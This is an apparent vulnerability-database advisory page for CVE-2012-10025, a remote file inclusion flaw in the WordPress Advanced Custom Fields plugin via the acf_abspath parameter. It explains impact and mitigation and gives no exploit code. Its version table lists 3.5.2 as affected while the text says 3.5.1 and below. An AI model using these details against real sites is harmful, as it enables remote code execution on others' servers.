CVE-2012-10025
BaseFortify
Publication date: 2025-08-05
Last updated on: 2025-08-07
Assigner: VulnCheck
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| wordpress | advanced_custom_fields | 3.5.1 |
| wordpress | advanced_custom_fields | 3.5.2 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-98 | The PHP application receives input from an upstream component, but it does not restrict or incorrectly restricts the input before its usage in "require," "include," or similar functions. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability is a remote file inclusion (RFI) issue in the WordPress plugin Advanced Custom Fields (ACF) version 3.5.1 and below. It occurs in the core/actions/export.php file. If the PHP configuration directive allow_url_include is enabled, an unauthenticated attacker can exploit the acf_abspath POST parameter to include and execute arbitrary remote PHP code on the server. This allows the attacker to execute code remotely under the web server's context.
How can this vulnerability impact me? :
The vulnerability can lead to remote code execution on the affected server, allowing an attacker to fully compromise the host. This means the attacker can execute arbitrary commands, potentially gaining control over the web server and access to sensitive data or resources.
What immediate steps should I take to mitigate this vulnerability?
To mitigate this vulnerability, immediately disable the PHP configuration directive allow_url_include if it is enabled. Additionally, update the Advanced Custom Fields (ACF) WordPress plugin to a version higher than 3.5.1 where this vulnerability is fixed. Restrict access to the vulnerable export.php file and monitor for any suspicious POST requests involving the acf_abspath parameter.